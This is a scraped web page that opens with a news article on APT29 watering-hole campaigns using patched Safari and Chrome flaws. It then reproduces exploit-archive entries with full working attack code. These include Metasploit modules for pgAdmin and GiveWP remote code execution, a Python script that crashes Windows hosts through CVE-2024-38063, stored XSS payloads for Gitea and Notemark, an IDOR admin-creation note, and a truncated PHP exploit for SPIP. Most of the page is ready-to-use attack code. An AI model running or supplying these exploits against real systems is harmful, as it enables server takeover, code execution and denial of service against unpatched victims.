Cybersecurity researchers have flagged multiple in-the-wild exploit campaigns that leveraged now-patched flaws in Apple Safari and Google Chrome browsers to infect mobile users with information-stealing malware.
"These campaigns delivered n-day exploits for which patches were available, but would still be effective against unpatched devices," Google Threat Analysis Group (TAG) researcher Clement

Browser Security / Vulnerability

Cybersecurity researchers have flagged multiple in-the-wild exploit campaigns that leveraged now-patched flaws in Apple Safari and Google Chrome browsers to infect mobile users with information-stealing malware.

"These campaigns delivered n-day exploits for which patches were available, but would still be effective against unpatched devices," Google Threat Analysis Group (TAG) researcher Clement Lecigne said in a report shared with The Hacker News.

The activity, observed between November 2023 and July 2024, is notable for delivering the exploits by means of a watering hole attack on Mongolian government websites, cabinet.gov\[.\]mn and mfa.gov\[.\]mn.

The intrusion set has been attributed with moderate confidence to a Russian state-backed threat actor codenamed APT29 (aka Midnight Blizzard), with parallels observed between the exploits used in the campaigns and those previously linked to commercial surveillance vendors (CSVs) Intellexa and NSO Group, indicating exploit reuse.

The vulnerabilities at the center of the campaigns are listed below -

*   **CVE-2023-41993** - A WebKit flaw that could result in arbitrary code execution when processing specially crafted web content (Fixed by Apple in iOS 16.7 and Safari 16.6.1 in September 2023)

*   **CVE-2024-4671** - A use-after-free flaw in Chrome's Visuals component that could result in arbitrary code execution (Fixed by Google in Chrome version 124.0.6367.201/.202 for Windows and macOS, and version 124.0.6367.201 for Linux in May 2024)

*   **CVE-2024-5274** - A type confusion flaw in the V8 JavaScript and WebAssembly engine that could result in arbitrary code execution (Fixed by Google in Chrome version 125.0.6422.112/.113 for Windows and macOS, and version 125.0.6422.112 for Linux in May 2024)

The November 2023 and February 2024 campaigns are said to have involved the compromises of the two Mongolian government websites – both in the first and only mfa.gov\[.\]mn in the latter – to deliver an exploit for CVE-2023-41993 by means of a malicious iframe component pointing to an actor-controlled domain.

"When visited with an iPhone or iPad device, the watering hole sites used an iframe to serve a reconnaissance payload, which performed validation checks before ultimately downloading and deploying another payload with the WebKit exploit to exfiltrate browser cookies from the device," Google said.

The payload is a cookie stealer framework that Google TAG previously detailed in connection with the 2021 exploitation of an iOS zero-day (CVE-2021-1879) to harvest authentication cookies from several popular websites, including Google, Microsoft, LinkedIn, Facebook, Yahoo, GitHub, and Apple iCloud, and send them via WebSocket to an attacker-controlled IP address.

"The victim would need to have a session open on these websites from Safari for cookies to be successfully exfiltrated," Google noted at the time, adding "attackers used LinkedIn messaging to target government officials from western European countries by sending them malicious links."

The fact that the cookie stealer module also singles out the website "webmail.mfa.gov\[.\]mn" suggests that Mongolian government employees were a likely target of the iOS campaign.

The mfa.gov\[.\]mn website was infected a third time in July 2024 to inject JavScript code that redirected Android users using Chrome to a malicious link that served an exploit chain combining the flaws CVE-2024-5274 and CVE-2024-4671 to deploy a browser information stealing payload.

In particular, the attack sequence uses CVE-2024-5274 to compromise the renderer and CVE-2024-4671 to achieve a sandbox escape vulnerability, ultimately making it possible to break out of Chrome site isolation protections and deliver a stealer malware.

"This campaign delivers a simple binary deleting all Chrome Crash reports and exfiltrating the following Chrome databases back to the track-adv\[.\]com server – similar to the basic final payload seen in the earlier iOS campaigns," Google TAG noted.

The tech giant further said the exploits used in the November 2023 watering hole attack and by Intellexa in September 2023 share the same trigger code, a pattern also observed in the triggers for CVE-2024-5274 used in the July 2024 watering hole attack and by NSO Group in May 2024.

What's more, the exploit for CVE-2024-4671 is said to share similarities with a previous Chrome sandbox escape that Intellexa was discovered as using in the wild in connection with another Chrome flaw CVE-2021-37973, which was addressed by Google in September 2021.

While it's currently not clear how the attackers managed to acquire the exploits for the three flaws, the findings make it amply clear that nation-state actors are using n-day exploits that were originally used as zero-days by CSVs.

It, however, raises the possibility that the exploits may have been procured from a vulnerability broker who previously sold them to the spyware vendors as zero-days, a steady supply of which keeps the ball rolling as Apple and Google shore up defenses.

"Moreover, watering hole attacks remain a threat where sophisticated exploits can be utilized to target those that visit sites regularly, including on mobile devices," the researchers said. "Watering holes can still be an effective avenue for n-day exploits by mass targeting a population that might still run unpatched browsers."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Russian Hackers Exploit Safari and Chrome Flaws in High-Profile Cyberattack

pgAdmin versions 8.4 and below are affected by a remote code execution vulnerability through the validate binary path API. This vulnerability allows attackers to execute arbitrary code on the server hosting PGAdmin, posing a severe risk to the database management system's integrity and the security of the underlying data.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  include Msf::Exploit::EXE  def initialize(info = {})    super(      update_info(        info,        'Name' => 'pgAdmin Binary Path API RCE',        'Description' => %q{          pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE)          vulnerability through the validate binary path API. This vulnerability          allows attackers to execute arbitrary code on the server hosting PGAdmin,          posing a severe risk to the database management system's integrity and the security of the underlying data.          Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated.        },        'License' => MSF_LICENSE,        'Author' => [          'M.Selim Karahan', # metasploit module          'Mustafa Mutlu', # lab prep. and QA          'Ayoub Mokhtar' # vulnerability discovery and write up        ],        'References' => [          [ 'CVE', '2024-3116'],          [ 'URL', 'https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/'],          [ 'URL', 'https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-pgadmin-cve-2024-3116']        ],        'Platform' => ['windows'],        'Arch' => ARCH_X64,        'Targets' => [          [ 'Automatic Target', {}]        ],        'DisclosureDate' => '2024-03-28',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'Reliability' => [ REPEATABLE_SESSION, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ]        }      )    )    register_options(      [        Opt::RPORT(8000),        OptString.new('USERNAME', [ false, 'User to login with', '']),        OptString.new('PASSWORD', [ false, 'Password to login with', '']),        OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/'])      ]    )  end  def check    version = get_version    return CheckCode::Unknown('Unable to determine the target version') unless version    return CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new('8.5')    CheckCode::Vulnerable("pgAdmin version #{version} is affected")  end  def set_csrf_token_from_login_page(res)    if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/      @csrf_token = Regexp.last_match(1)      # at some point between v7.0 and 7.7 the token format changed    elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first)      @csrf_token = element['value']    end  end  def set_csrf_token_from_config(res)    if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/      @csrf_token = Regexp.last_match(1)      # at some point between v7.0 and 7.7 the token format changed    else      @csrf_token = res.body.scan(/pgAdmin\['csrf_token'\]\s*=\s*'([^']+)'/)&.flatten&.first    end  end  def auth_required?    res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'keep_cookies' => true)    if res&.code == 302 && res.headers['Location']['login']      true    elsif res&.code == 302 && res.headers['Location']['browser']      false    end  end  def on_windows?    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true)    if res&.code == 200      platform = res.body.scan(/pgAdmin\['platform'\]\s*=\s*'([^']+)';/)&.flatten&.first      return platform == 'win32'    end  end  def get_version    if auth_required?      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)    else      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/'), 'keep_cookies' => true)    end    html_document = res&.get_html_document    return unless html_document && html_document.xpath('//title').text == 'pgAdmin 4'    # there's multiple links in the HTML that expose the version number in the [X]XYYZZ,    # see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27    versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ }    return unless versioned_link    Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}")  end  def csrf_token    return @csrf_token if @csrf_token    if auth_required?      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)      set_csrf_token_from_login_page(res)    else      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true)      set_csrf_token_from_config(res)    end    fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token    @csrf_token  end  def exploit    if auth_required? && !(datastore['USERNAME'].present? && datastore['PASSWORD'].present?)      fail_with(Failure::BadConfig, 'The application requires authentication, please provide valid credentials')    end    if auth_required?      res = send_request_cgi({        'uri' => normalize_uri(target_uri.path, 'authenticate/login'),        'method' => 'POST',        'keep_cookies' => true,        'vars_post' => {          'csrf_token' => csrf_token,          'email' => datastore['USERNAME'],          'password' => datastore['PASSWORD'],          'language' => 'en',          'internal_button' => 'Login'        }      })      unless res&.code == 302 && res.headers['Location'] != normalize_uri(target_uri.path, 'login')        fail_with(Failure::NoAccess, 'Failed to authenticate to pgAdmin')      end      print_status('Successfully authenticated to pgAdmin')    end    unless on_windows?      fail_with(Failure::BadConfig, 'This exploit is specific to Windows targets!')    end    file_name = 'pg_restore.exe'    file_manager_upload_and_trigger(file_name, generate_payload_exe)  rescue ::Rex::ConnectionError    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")  end  # file manager code is copied from pgadmin_session_deserialization module  def file_manager_init    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'file_manager/init'),      'method' => 'POST',      'keep_cookies' => true,      'ctype' => 'application/json',      'headers' => { 'X-pgA-CSRFToken' => csrf_token },      'data' => {        'dialog_type' => 'storage_dialog',        'supported_types' => ['sql', 'csv', 'json', '*'],        'dialog_title' => 'Storage Manager'      }.to_json    })    unless res&.code == 200 && (trans_id = res.get_json_document.dig('data', 'transId')) && (home_folder = res.get_json_document.dig('data', 'options', 'homedir'))      fail_with(Failure::UnexpectedReply, 'Failed to initialize a file manager transaction Id or home folder')    end    return trans_id, home_folder  end  def file_manager_upload_and_trigger(file_path, file_contents)    trans_id, home_folder = file_manager_init    form = Rex::MIME::Message.new    form.add_part(      file_contents,      'application/octet-stream',      'binary',      "form-data; name=\"newfile\"; filename=\"#{file_path}\""    )    form.add_part('add', nil, nil, 'form-data; name="mode"')    form.add_part(home_folder, nil, nil, 'form-data; name="currentpath"')    form.add_part('my_storage', nil, nil, 'form-data; name="storage_folder"')    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"),      'method' => 'POST',      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form.bound}",      'headers' => { 'X-pgA-CSRFToken' => csrf_token },      'data' => form.to_s    })    unless res&.code == 200 && res.get_json_document['success'] == 1      fail_with(Failure::UnexpectedReply, 'Failed to upload file contents')    end    upload_path = res.get_json_document.dig('data', 'result', 'Name')    register_file_for_cleanup(upload_path)    print_status("Payload uploaded to: #{upload_path}")    send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/misc/validate_binary_path'),      'method' => 'POST',      'keep_cookies' => true,      'ctype' => 'application/json',      'headers' => { 'X-pgA-CSRFToken' => csrf_token },      'data' => {        'utility_path' => upload_path[0..upload_path.size - 16]      }.to_json    })    true  endend

pgAdmin 8.4 Remote Code Execution

The GiveWP Donation plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP object injection (POI) flaw granting an unauthenticated attacker arbitrary code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Wordpress  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'GiveWP Unauthenticated Donation Process Exploit',        'Description' => %q{          The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP Object Injection (POI) attack granting an unauthenticated arbitrary code execution.        },        'License' => MSF_LICENSE,        'Author' => [          'Villu Orav',         # Initial Discovery          'EQSTSeminar',        # Proof of Concept          'Julien Ahrens',      # Vulnerability Analysis          'Valentin Lobstein'   # Metasploit Module        ],        'References' => [          ['CVE', '2024-5932'],          ['URL', 'https://github.com/EQSTSeminar/CVE-2024-5932'],          ['URL', 'https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932'],          ['URL', 'https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin']        ],        'DisclosureDate' => '2024-08-25',        'Platform' => %w[unix linux win],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Unix/Linux Command Shell',            {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ],          [            'Windows Command Shell',            {              'Platform' => 'win',              'Arch' => ARCH_CMD              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )      )  end  def check    return CheckCode::Unknown unless wordpress_and_online?    print_status("WordPress Version: #{wordpress_version}") if wordpress_version    check_code = check_plugin_version_from_readme('give', '3.14.2')    return CheckCode::Safe unless check_code.code == 'appears'    print_good("Detected GiveWP Plugin version: #{check_code.details[:version]}")    CheckCode::Appears  end  def exploit    forms = fetch_form_list    fail_with(Failure::UnexpectedReply, 'No forms found.') if forms.empty?    selected_form = forms.sample    valid_form = retrieve_and_analyze_form(selected_form['id'])    return print_error('Failed to retrieve a valid form for exploitation.') unless valid_form    print_status("Using Form ID: #{valid_form['give_form_id']} for exploitation.")    send_exploit_request(      valid_form['give_form_id'],      valid_form['give_form_hash'],      valid_form['give_price_id'],      valid_form['give_amount']    )  end  def fetch_form_list    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),      'data' => 'action=give_form_search'    )    return print_error('Failed to retrieve form list.') unless res&.code == 200    forms = JSON.parse(res.body)    form_ids = forms.map { |form| form['id'] }.sort    print_good("Successfully retrieved form list. Available Form IDs: #{form_ids.join(', ')}")    forms  end  def retrieve_and_analyze_form(form_id)    form_res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),      'vars_post' => { 'action' => 'give_donation_form_nonce', 'give_form_id' => form_id }    )    return unless form_res&.code == 200    form_data = JSON.parse(form_res.body)    give_form_id = form_id    give_form_hash = form_data['data']    give_price_id = '0'    give_amount = '$10.00'    # Somehow, can't randomize give_price_id and give_amount otherwise the exploit won't work.    return unless give_form_hash    {      'give_form_id' => give_form_id,      'give_form_hash' => give_form_hash,      'give_price_id' => give_price_id,      'give_amount' => give_amount    }  end  def send_exploit_request(give_form_id, give_form_hash, give_price_id, give_amount)    final_payload = format(      'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";' \      'O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{' \      's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";' \      'O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";' \      's:10:"shell_exec";s:12:"\\0*\\0generator";' \      'O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{' \      's:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%<length>d:"%<encoded>s";}}' \      's:13:"\\0*\\0maxRetries";i:10;}}}}}}',      length: payload.encoded.length,      encoded: payload.encoded    )    data = {      'give-form-id' => give_form_id,      'give-form-hash' => give_form_hash,      'give-price-id' => give_price_id,      'give-amount' => give_amount,      'give_first' => Faker::Name.first_name,      'give_last' => Faker::Name.last_name,      'give_email' => Faker::Internet.email,      'give_title' => final_payload,      'give-gateway' => 'offline',      'action' => 'give_process_donation'    }    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),      'data' => URI.encode_www_form(data)    }, 0)  endend

WordPress GiveWP Donation / Fundraising Platform 3.14.1 Code Execution

Microsoft Windows IPv6 vulnerability checking proof of concept python script that causes a denial of service. Windows 10 and 11 versions under 10.0.26100.1457 and Server 2016-2019-2022 versions under 10.0.17763.6189 are affected.

    #!/usr/bin/env python3# -*- coding: utf-8 -*-# Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service# Date: 2024-08-07# Exploit Author: Photubias# Vendor Homepage: https://microsoft.com# Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063# Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189# Tested on: Windows 11 23H2 and Windows Server 2022# CVE: CVE-2024-38063import os, subprocess, re, time, sys## VariablessDstIP = 'fe80::78b7:6283:49ad:c565'        ## Placeholderif len(sys.argv) > 1: sDstIP = sys.argv[1]  ## Please provide an argumentsDstMAC = '00:0C:29:55:E1:C8'               ## Not required, will try to get the MAC via Neighbor DiscoveryiBatches = 20iCorruptions = 20                           ## How many times do we want to corrupt the tcpip.sys memory per batchtry:    print('--- Loading Scapy, might take some time ...')    from scapy.config import conf    conf.ipv6_enabled = False    import scapy.all as scapy    scapy.conf.verb = 0except:    print('Error while loading scapy, please run "pip install scapy"')    exit(1)import logginglogging.getLogger('scapy.runtime').setLevel(logging.ERROR)def selectInterface(): #adapter[] = npfdevice, ip, mac    def getAllInterfaces():         lstInterfaces=[]        if os.name == 'nt':            proc = subprocess.Popen('getmac /NH /V /FO csv | FINDSTR /V /I disconnected', shell=True, stdout=subprocess.PIPE)            for bInterface in proc.stdout.readlines():                lstInt = bInterface.split(b',')                sAdapter = lstInt[0].strip(b'"').decode()                sDevicename = lstInt[1].strip(b'"').decode()                sMAC = lstInt[2].strip(b'"').decode().lower().replace('-', ':')                sWinguID = lstInt[3].strip().strip(b'"').decode()[-38:]                proc = subprocess.Popen('netsh int ipv6 show addr "{}" | FINDSTR /I Address'.format(sAdapter), shell=True, stdout=subprocess.PIPE)                try: sIP = re.findall(r'[\w:]+:+[\w:]+', proc.stdout.readlines()[0].strip().decode())[0]                except: sIP = ''                if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID]) # When no or bad MAC address (e.g. PPP adapter), do not add        else:            proc = subprocess.Popen('for i in $(ip address | grep -v "lo" | grep "default" | cut -d":" -f2 | cut -d" " -f2);do echo $i $(ip address show dev $i | grep "inet6 " | cut -d" " -f6 | cut -d"/" -f1) $(ip address show dev $i | grep "ether" | cut -d" " -f6);done', shell=True, stdout=subprocess.PIPE)            for bInterface in proc.stdout.readlines():                lstInt = bInterface.strip().split(b' ')                try:                     if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', ''])                except: pass        return lstInterfaces        lstInterfaces = getAllInterfaces()    if len(lstInterfaces) > 1:        i = 1        for lstInt in lstInterfaces: #array of arrays: adapter, ip, mac, windows devicename, windows guID            print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0]))            i += 1        #sAnswer = input('[?] Please select the adapter [1]: ')        sAnswer='3'    else: sAnswer = None    if not sAnswer or sAnswer == '' or not sAnswer.isdigit() or int(sAnswer) >= i: sAnswer = 1    iAnswer = int(sAnswer) - 1    sNPF = lstInterfaces[iAnswer][0]    sIP = lstInterfaces[iAnswer][1]    sMAC = lstInterfaces[iAnswer][2]    if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4]    return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3])def get_packets(iID, sDstIPv6, sDstMac=None):    iFragID = 0xbedead00 + iID    oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')])    oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 1, offset = 0) / 'notalive'    oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 0, offset = 1)    if sDstMac: ## Should always be this, it seems sending to 'ff:ff:ff:ff:ff:ff' does not work        oPacket1 = scapy.Ether(dst=sDstMac) / oPacket1        oPacket2 = scapy.Ether(dst=sDstMac) / oPacket2        oPacket3 = scapy.Ether(dst=sDstMac) / oPacket3    return [oPacket1, oPacket2, oPacket3]def doIPv6ND(sDstIP, sInt): ## Try to get a MAC address via IPv6 Neighbour Sollicitation    sMACResp = None    oNeighborSollicitation = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff')    oResponse = scapy.sr1(oNeighborSollicitation, timeout=5, iface=sInt)    if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse:        sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr    return sMACResplstInt = selectInterface() ## NPF, IPv6, MAC, NamesMAC = doIPv6ND(sDstIP, lstInt[0])if sMAC:     print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}')    sDstMAC = sMACelif sDstMAC != '':    print('[-] Target not responding to Neighbor Sollicitation Packets, using the provided MAC {}'.format(sDstMAC))else:     print('[-] Without a MAC address, this exploit will probably not work')lstPacketsToSend = []for i in range(iBatches):    for j in range(iCorruptions):        lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC)## 'send' is Layer3 (let scapy figure out the MAC address), 'sendp' is L2 (MAC address is filled in, much better)print('[i] Verifying vulnerability against IPv6 address {}'.format(sDstIP))## Verification first: "ICMPv6ParamProblem"lstResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5)if lstResp and scapy.IPv6 in lstResp[0] and scapy.ICMPv6ParamProblem in lstResp[0]:     print('[+] Yes, {} is vulnerable and exploitable for CVE-2024-38063'.format(sDstIP))else:     input('[-] Not vulnerable or firewall is enabled. Please verify and rerun or press enter to continue')print('[i] Waiting 10 seconds to let the target cool down (more is better)')time.sleep(10)input('[?] OK, continue to execute the Denial Of Service (BSOD)? Press Ctrl+C to cancel now')########## Exploitprint('[+] Sending {} packets now via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3]))scapy.conf.verb = 1scapy.sendp(lstPacketsToSend, iface=lstInt[0])print('[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash')

Microsoft Windows IPv6 CVE-2024-38063 Checker / Denial Of Service

Gitea version 1.22.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Stored XSS in Gitea# Date: 27/08/2024# Exploit Authors: Catalin Iovita & Alexandru Postolache# Vendor Homepage: (https://github.com/go-gitea/gitea)# Version: 1.22.0# Tested on: Linux 5.15.0-107, Go 1.23.0# CVE: CVE-2024-6886## Vulnerability DescriptionGitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.## Steps to Reproduce1. Log in to the application.2. Create a new repository or modify an existing repository by clicking the Settings button from the `$username/$repo_name/settings` endpoint.3. In the Description field, input the following payload:    <a href=javascript:alert()>XSS test</a>4. Save the changes.5. Upon clicking the repository description, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.

Gitea 1.22.0 Cross Site Scripting

Notemark versions 0.13.0 and below suffer from a cross site scripting vulnerability.

    # Exploit Title: Stored XSS in NoteMark# Date: 07/29/2024# Exploit Author: Alessio Romano (sfoffo)# Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/# Version: 0.13.0 and below# Tested on: Linux# References:https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819,https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182,https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3# CVE: CVE-2024-41819## Steps to Reproduce1. Log in to the application.2. Create a new note or enter a previously created note.3. Access the note editor functionality from the selected note by clickingon the "Editor" tab.4. Input the following payload:[xss-link](javascript:alert(1))5. Save the changes.6. Click on the "Rendered" tab to view the rendered markdown version of thenote. Click on the previously created link to pop the injected alert.## HTTP Request PoCPUT /api/notes/<note-uuid>/content HTTP/1.1Host: localhost:8000Accept: */*Content-Type: text/plain;charset=UTF-8Content-Length: 34Sec-Fetch-Site: same-originAuthorization: Bearer <TOKEN>[xss-link](javascript:alert(1))

Notemark 0.13.0 Cross Site Scripting

Online Graduate Tracer System version 1.0.0 suffers from an insecure direct object reference vulnerability.

**Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference**

Posted Aug 29, 2024

Authored by indoushka

Online Graduate Tracer System version 1.0.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 0abd7e5d887d9e2204c565886d418ad0656b2616bb80e508761e6e23aa8bf66f

Download | Favorite | View

**Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : Online Graduate Tracer System V 1.0.0 IDOR Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : leads to the creation of a new admin.[+] use payload : /admin/user_ad.php or /admin/homead.php[+] http://127.0.0.1/tracking/admin/user_ad.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,590)
*   Arbitrary (16,908)
*   BBS (2,859)
*   Bypass (1,880)
*   CGI (1,034)
*   Code Execution (7,844)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,413)
*   DoS (25,127)
*   Encryption (2,389)
*   Exploit (53,324)
*   File Inclusion (4,266)
*   File Upload (1,001)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,244)
*   Local (14,809)
*   Magazine (587)
*   Overflow (13,180)
*   Perl (1,435)
*   PHP (5,228)
*   Proof of Concept (2,397)
*   Protocol (3,733)
*   Python (1,649)
*   Remote (31,707)
*   Root (3,639)
*   Rootkit (529)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,033)
*   Shell (3,282)
*   Shellcode (1,217)
*   Sniffer (903)
*   Spoof (2,279)
*   SQL Injection (16,630)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,027)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,270)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,941)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,657)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,783)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,679)
*   Other

Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference

SPIP version 4.2.5 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.5 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, 